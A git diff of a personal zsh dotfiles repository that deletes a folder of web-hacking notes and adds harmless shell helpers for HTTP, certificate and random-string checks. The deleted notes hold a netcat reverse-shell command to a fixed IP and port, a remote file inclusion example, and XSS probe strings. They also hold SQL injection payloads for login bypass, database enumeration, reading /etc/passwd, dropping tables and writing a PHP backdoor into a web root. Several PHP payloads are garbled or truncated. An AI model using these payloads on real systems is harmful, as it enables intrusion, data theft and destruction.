-s:ftp.txt -nc.exe -e cmd.exe 192.168.1.1  31337 - -- - - - - - - - - ftp.txt'); ?> -> ftp.txt'); ?> -> ftp.txt'); ?> -> ftp.txt'); ?> -> ftp.txt'); ?> -> ftp.txt'); ?> - - - - - - - - - -Remote file Inclusion -===================== -Example: http://192.168.1.1/add.php?name=asdasd&LANG=http://192.168.1.1/login.txt%00 -Note: the login.txt contains - diff --git a/tools/v3das/web_fuzz_strings.txt b/tools/v3das/web_fuzz_strings.txt deleted file mode 100755 index 72bb7c3..0000000 --- a/tools/v3das/web_fuzz_strings.txt +++ /dev/null @@ -1,14 +0,0 @@ - -XSS locator -';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'> - - -XSS locator 2 -'';!--"=&{()} - - - - -Other fuzzing char list -><>)()}{}][]'"`;--..\/\\//../~=-1!--?||*&&%00%0a%0d\r\n#><>}{} - diff --git a/tools/v3das/web_injection_php.txt b/tools/v3das/web_injection_php.txt deleted file mode 100755 index 72dd935..0000000 --- a/tools/v3das/web_injection_php.txt +++ /dev/null @@ -1,11 +0,0 @@ - -PHP command injection -===================== - -There are just some ideas. - - - - - - diff --git a/tools/v3das/web_injection_sqli.txt b/tools/v3das/web_injection_sqli.txt deleted file mode 100755 index d459f64..0000000 --- a/tools/v3das/web_injection_sqli.txt +++ /dev/null @@ -1,43 +0,0 @@ - -SQLi notes -========== - -Login bypass -any' or 1=1 limit 1 ;# -' OR '1' = '1 / ' OR '1' = '1 -;# ;-- # - - -?id=737 order by 6 --> Testing max columns -?id=737 union select all 1,2,3,4,5,6 --> Testing max columns in database -?id=737 union select all 1,2,3,4,@@version,6 --> Version enumeration, commands to run or exploits? -?id=737 union select all 1,2,3,4,table_name,6 FROM information_schema.tables --> Table enumeration -?id=737 union select all 1,2,3,4,column_name,6 FROM information_schema.columns where table_name='user' --> Column enumeration -?id=737 union select 1,2,3,4,concat(name,0x3a,password ),6 FROM users --> After knowing about "users" pull out the info - - -More examples - -x%') # -x%') or 1=1 # -x%') order by 4 # -x%') union select all 4 # -x%') union select all 1,2,3@@version # -x%') and 1=1 # - -x%') and UNION ALL SELECT LOAD_FILE(‘/etc/passwd’) # -x%') and drop table if exists customers # -x%') and create database test # -x%') ; DROP ALL TABLES; # - -@@hostname - -wget -qO- http://www.site.com --user-agent=useragent --post-data="key=value" - - -Adding backdor.php -?id=737 union select all 1,2,3,4,"",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php' - -Getting a shell with php execute -192.168.3.1/comment.php?id=737 union select all 1,2,3,4," ftp.txt'); ?>> ftp.txt'); ?>> ftp.txt'); ?>> ftp.txt'); ?>> ftp.txt'); ?>> ftp.txt'); ?>",6 into OUTFILE 'c:/xampp/htdocs/makeftp12.php' - diff --git a/tools/v3das/web_xss_cookie_stealing.txt b/tools/v3das/web_xss_cookie_stealing.txt deleted file mode 100755 index e494f29..0000000 --- a/tools/v3das/web_xss_cookie_stealing.txt +++ /dev/null @@ -1,3 +0,0 @@ - - - diff --git a/zsh_files/.zsh b/zsh_files/.zsh deleted file mode 100755 index e69de29..0000000 diff --git a/zsh_files/.zshrc b/zsh_files/.zshrc deleted file mode 100755 index c76c90f..0000000 --- a/zsh_files/.zshrc +++ /dev/null @@ -1,3 +0,0 @@ -source ~/.cryptozsh/general.zsh -source ~/.cryptozsh/crypto.zsh -source ~/.cryptozsh/vedas.zsh diff --git a/zsh_files/crypto.zsh b/zsh_files/crypto.zsh index 86d9f13..126415a 100755 --- a/zsh_files/crypto.zsh +++ b/zsh_files/crypto.zsh @@ -1,3 +1,5 @@ +# If needed, run locally: https://github.com/gchq/CyberChef + # Create a temporary file random name and open it with vi function tmp { curran=$RANDOM$RANDOM @@ -5,25 +7,12 @@ function tmp { vi /tmp/$curran } - -# HTTP and HTTPS response check -function chkhttpz { - # http response checks from a given host / port - echo "HTTP responses" - wget --spider -S "http://$1:$2/" 2>&1 | grep "HTTP/" - - echo "\nHTTPS responses" - wget --spider -S "https://$1:$2/" 2>&1 | grep "HTTP/" -} - - # Show certificate of website function chkcrt { # check ssl certificate of a server openssl s_client -showcerts -connect $1:$2 } - # Quickly get random characters function rnd { # get some random characters diff --git a/zsh_files/gen6.zsh b/zsh_files/gen6.zsh new file mode 100755 index 0000000..0aad298 --- /dev/null +++ b/zsh_files/gen6.zsh @@ -0,0 +1,47 @@ +# Create a temporary file random name and open it with vi +function tmp { + curran=$RANDOM$RANDOM + echo "Temporary file name: /tmp/$curran" + vi /tmp/$curran +} + + +# HTTP and HTTPS response check +function chkhttpz { + # http response checks from a given host / port + echo "HTTP responses" + wget --spider -S "http://$1:$2/" 2>&1 | grep "HTTP/" + + echo "\nHTTPS responses" + wget --spider -S "https://$1:$2/" 2>&1 | grep "HTTP/" +} + +# HTTP and HTTPS response check +function chkgen6 { + echo "\nHTTPS responses for Gen6 App" + wget --spider -S "https://gen6.app/" 2>&1 | grep "HTTP/" + + echo "HTTP responses Gen6 LinkFree" + wget --spider -S "http://link.g6.network/" 2>&1 | grep "HTTP/" + + echo "HTTP responses Gen6 LinkFree" + timeout 2 websocat -1 wss://gen6.app/node -v 2>&1 | timeout 2 grep "Connected" +} + + +# Show certificate of website +function chkcrt { + # check ssl certificate of a server + openssl s_client -showcerts -connect $1:$2 +} + + +# Quickly get random characters +function rnd { + # get some random characters + cat /dev/urandom | tr -dc _A-Z-a-z-0-9.,! | head -c${1:-8};echo; + cat /dev/urandom | tr -dc _A-Z-a-z-0-9.,! | head -c${1:-16};echo; + cat /dev/urandom | tr -dc _A-Z-a-z-0-9.,! | head -c${1:-32};echo; + cat /dev/urandom | tr -dc _A-Z-a-z-0-9.,! | head -c${1:-64};echo; +} + diff --git a/zsh_files/general.zsh b/zsh_files/general.zsh index 713d228..88ae75b 100755 --- a/zsh_files/general.zsh +++ b/zsh_files/general.zsh @@ -1,19 +1,24 @@ #Aliases alias py='python3' -alias bcp='python3 ~/.cryptozsh_tools/bcp.py' +alias python='python3' +alias ratesx='curl rate.sx' alias hash-identifier='python3 ~/.cryptozsh_tools/hash-identifier.py' # Add yours :) - # Menuselect and requirements for v3das (changing this might break v3das) autoload -U compinit compinit zstyle ':completion:*' menu select=2 +# Make ctrl+backwards work +bindkey "^[[1;5C" emacs-forward-word +bindkey "^[[1;5D" emacs-backward-word # History -# Off - +HISTFILE=~/.zsh_history +HISTSIZE=69 +SAVEHIST=50 +setopt appendhistory # Opts setopt AUTO_CD @@ -67,10 +72,9 @@ function git_prompt_info { PROMPT='%{$fg[yellow]%}$(whoami)%{$reset_color%} %~%<< $(git_prompt_info) ${PR_BOLD_WHITE}>%{${reset_color}%} ' - # btc price check on coindesk function btcp { - . torsocks on # Turn on for extra security + #. torsocks on # Turn on for extra security echo "BTC price on CoinDesk " curl -s https://api.coindesk.com/v1/bpi/currentprice.json | cut -d '"' -f 38 } diff --git a/zsh_files/hacking.zsh b/zsh_files/hacking.zsh deleted file mode 100755 index e894282..0000000 --- a/zsh_files/hacking.zsh +++ /dev/null @@ -1 +0,0 @@ -#TBA diff --git a/zsh_files/vedas.zsh b/zsh_files/vedas.zsh deleted file mode 100755 index 2e63cde..0000000 --- a/zsh_files/vedas.zsh +++ /dev/null @@ -1,25 +0,0 @@ -fpath=(~/.cryptozsh_tools/v3das $fpath) - -# Requirements -#autoload -U compinit -#compinit -#zstyle ':completion:*' menu select=2 - -function nls { - echo "\nYou can get help from the following topics:\n" - for f in ~/.cryptozsh_tools/v3das/* ; do - echo $f | rev | cut -d'/' -f1 | rev | cut -d'.' -f1 | egrep -v "^_n" - done - echo "" -} - - -function n { - # query knowledgebase, use tab after n - if [ -d "~/.cryptozsh_tools/v3das" ] - then - echo "knowledge base / notes are missing" - else - cat ~/.cryptozsh_tools/v3das/$1 - fi -} diff --git a/zsh_files/zshrc b/zsh_files/zshrc new file mode 100755 index 0000000..40f911c --- /dev/null +++ b/zsh_files/zshrc @@ -0,0 +1,3 @@ +source ~/.gen6zsh/general.zsh +source ~/.gen6zsh/crypto.zsh +source ~/.gen6zsh/gen6.zsh